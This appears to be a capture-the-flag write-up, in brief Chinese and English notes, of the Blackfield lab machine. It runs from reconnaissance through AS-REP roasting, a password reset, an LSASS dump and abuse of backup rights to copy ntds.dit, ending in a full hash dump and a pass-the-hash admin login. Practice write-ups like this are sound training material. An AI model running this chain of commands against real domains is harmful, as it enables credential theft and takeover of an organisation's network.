Recon & Enum
export IP=10.10.10.192
nmap -sC -A -p- --min-rate 1000 -T4 $IP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-12 10:45:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49676/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m59s
| smb2-time:
| date: 2024-01-12T10:46:11
|_ start_date: N/A
crackmapexec smb $IP -u guest -p '' --shares

没有翻到什么可用的文件信息
crackmapexec smb $IP -u guest -p '' --rid-brute 10000

- 爆出的用户
Administrator
DC01$
DnsAdmins
DnsUpdateProxy
Guest
PC01$
SRV-EXCHANGE$
SRV-FILE$
SRV-INTRANET$
SRV-WEB$
audit2020
krbtgt
lydericlefebvre
support
svc_backup
- AS-REP Roasting 得到 `[email protected]` Hash

ldapsearch -x -H "ldap://$IP" -s base namingContexts

ldapsearch -x -H "ldap://$IP" -b "DC=BLACKFIELD,DC=local"

Shell as User - support
- 爆破 Hash
hashcat -m 18200 hash.list /usr/share/wordlists/rockyou.txt

- 尝试登录用户
support:#00^BlackKnight

提示认证失败
- 查看用户 samba 权限

目录可读,但是没什么东西
Shell as User - AUDIT2020
- 遛狗,发现可以重置密码

https://www.thehacker.recipes/a-d/movement/dacl/forcechangepassword


- bloodhound 看到没有远程管理的权限,发现新的 samba 目录

smbclient -U BLACKFIELD.local/AUDIT2020 //10.10.10.192/forensic

Shell as User - svc_backup
发现内存 lsass 相关文件,尝试 pypykatz lsa minidump lsass.DMP

svc_backup:9658d1d1dcd9250115e2205d9f48400d
administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62
- 经过尝试 svc_backup 可以登录

- 拥有备份权限,直接备份
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
- 域环境可以使用 wbadmin.exe.exe 来 dump NTDS.dit

看到 svc_backup 账户可以写入 samba/C$
# 创建目录挂载到 V 盘
net use V: \\10.10.10.192\C$\temp2 /user:smbuser password
# 测试
echo test > c:\temp2\test.txt
dir v:\
echo "Y" | wbadmin start backup -backuptarget:\\10.10.10.192\C$\temp2 -include:c:\windows\ntds
wbadmin get versions
# 更换上面看到的版本时间
echo "Y" | wbadmin start recovery -version:01/12/2024-15:26 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\temp2 -notrestoreacl
操作完成后,可以在 C:\temp2 看到 ntds.dit

impacket-secretsdump -sam sam.bak -system system.bak -ntds ntds.dit local

evil-winrm -i 10.10.10.192 -u 'administrator' -H '184fb5e5178480be64824d4cd53b99ee'

Hash dump
impacket-secretsdump -sam sam.bak -system system.bak -ntds ntds.dit local
---
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:8dc97ba2120794582ea63a4c790da901:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
